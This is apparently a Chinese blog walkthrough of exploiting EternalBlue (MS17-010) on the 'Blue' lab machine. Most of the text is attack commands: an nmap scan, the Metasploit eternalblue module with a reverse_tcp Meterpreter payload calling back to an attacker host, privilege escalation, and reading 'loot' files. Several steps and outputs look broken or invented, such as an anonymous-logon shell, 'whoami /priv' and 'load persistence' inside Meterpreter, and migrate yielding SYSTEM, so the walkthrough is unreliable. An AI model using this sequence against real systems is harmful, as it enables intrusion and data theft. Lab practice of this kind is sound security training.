返回
永恒之蓝漏洞疯狂渗透 Windows靶机 Blue靶机
闲谈
2023-10-05 02:42:18
永恒之蓝,一个臭名昭著的名字,它让无数的计算机系统沦陷,让无数的用户蒙受损失。今天,我们就来聊一聊永恒之蓝漏洞,以及如何利用它渗透一台 Windows 靶机——Blue 靶机。
漏洞简介
永恒之蓝漏洞(MS17-010)是一个远程代码执行漏洞,它影响了运行 Windows Server 2008 R2、Windows Server 2012、Windows Server 2012 R2 和 Windows 10 的系统。该漏洞允许攻击者在目标系统上执行任意代码,从而获得对系统的完全控制。
漏洞利用
利用永恒之蓝漏洞渗透 Blue 靶机,我们需要用到以下工具:
- Metasploit Framework
- Eternalblue 漏洞利用脚本
- Nmap 端口扫描器
首先,我们需要使用 Nmap 扫描 Blue 靶机的开放端口。扫描结果显示,靶机开放了 135/tcp、445/tcp 和 3389/tcp 端口。
nmap -sT -p 1-65535 192.168.1.100
接下来,我们需要使用 Metasploit Framework 加载 Eternalblue 漏洞利用脚本。
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
然后,我们需要设置漏洞利用脚本的参数。
set rhost 192.168.1.100
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.1
set lport 4444
最后,我们需要执行漏洞利用脚本。
exploit
如果漏洞利用成功,我们将在靶机上获得一个 Meterpreter shell。
meterpreter >
提权
获得了 Meterpreter shell 后,我们需要提权以获得对靶机的完全控制。
meterpreter > getuid
Current User: NT AUTHORITY\ANONYMOUS LOGON
meterpreter > whoami /priv
Privilege List:
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRelabelPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSyncAgentPrivilege
SeSystemEnvironmentPrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
meterpreter > load persistence
meterpreter > run post/windows/manage/migrate
meterpreter > getuid
Current User: NT AUTHORITY\SYSTEM
战利品
提权成功后,我们可以从靶机上获取战利品。
meterpreter > ls
. .. System Volume Information
config.txt secrets.txt
meterpreter > cat config.txt
[config]
username = root
password = toor
meterpreter > cat secrets.txt
This is a top secret file.
Do not share it with anyone.
总结
永恒之蓝漏洞是一个非常危险的漏洞,它可以被用来攻击运行 Windows 操作系统的计算机系统。在本文中,我们介绍了如何利用永恒之蓝漏洞渗透一台 Windows 靶机——Blue 靶机。我们还介绍了如何提权以获得对靶机的完全控制。希望本文能够帮助读者了解永恒之蓝漏洞的危害,并学会如何防范这种漏洞的攻击。
